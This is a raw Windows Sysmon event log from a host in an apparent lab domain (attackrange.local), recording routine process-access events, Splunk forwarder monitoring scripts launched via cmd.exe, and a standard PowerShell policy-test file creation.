13:34:20.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.220{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.220{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E5C-6005-6100-00000000A301}3464C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.220{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5C-6005-6100-00000000A301}3464C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.223{59A5CD1D-8E5C-6005-6100-00000000A301}3464C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.111{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E5C-6005-6000-00000000A301}3492C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:20.111{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.111{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E5C-6005-6000-00000000A301}3492C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.111{59A5CD1D-8E56-6005-3000-00000000A301}25323660C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E5C-6005-6000-00000000A301}3492C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:20.114{59A5CD1D-8E5C-6005-6000-00000000A301}3492C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x80000000000000002334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.979{59A5CD1D-8E5D-6005-6B00-00000000A301}3940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_r0bjdzfj.ckf.ps12021-01-18 13:34:21.979 10341000x80000000000000002333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:21.971{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E5D-6005-6B00-00000000A301}3940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:21.941{59A5CD1D-8E5B-6005-5B00-00000000A301}39363912C:\Windows\system32\conhost.exe{59A5CD1D-8E5D-6005-6B00-00000000A301}3940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
